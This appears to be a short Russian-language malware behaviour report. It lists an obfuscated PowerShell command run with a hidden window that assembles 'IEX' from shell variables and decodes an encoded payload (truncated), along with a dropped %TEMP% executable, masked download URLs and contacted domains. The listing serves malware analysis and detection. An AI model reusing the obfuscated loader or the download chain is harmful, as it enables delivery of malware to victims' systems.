Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $SHEllId[1]+$SheLLiD[13]+'X')(" $( sET-varIABLe 'OFs' '' )"+[stRING]('114W7O38i24E107J56-51>33O123W57O52X60-51U53J34>118>24>51Z34E120i1O51O52Z21U58U63>51Z56Z34O109Z114Z33-29X0X107X113-62i3...
- %TEMP%\62.exe
- %TEMP%\62.exe
- 'ca####digital.com':80
- 'bo####assage.com.ua':80
- 'bo####assage.com.ua':443
- 'de###lant.com':80
- 'de###lant.com':443
- http://www.ca####digital.com/7mCJCoAwT/
- http://www.bo####assage.com.ua/V9vDw5C23/
- http://www.de###lant.com/CFsF9RU/
- 'bo####assage.com.ua':443
- 'de###lant.com':443
- DNS ASK de###auto.com
- DNS ASK as##vam.com
- DNS ASK ca####digital.com
- DNS ASK bo####assage.com.ua
- DNS ASK de###lant.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $SHEllId[1]+$SheLLiD[13]+'X')(" $( sET-varIABLe 'OFs' '' )"+[stRING]('114W7O38i24E107J56-51>33O123W57O52X60-51U53J34>118>24>51Z34E120i1O51O52Z21U58U63>51Z56Z34O109Z114Z33-29X0X107X113-62i3...' (со скрытым окном)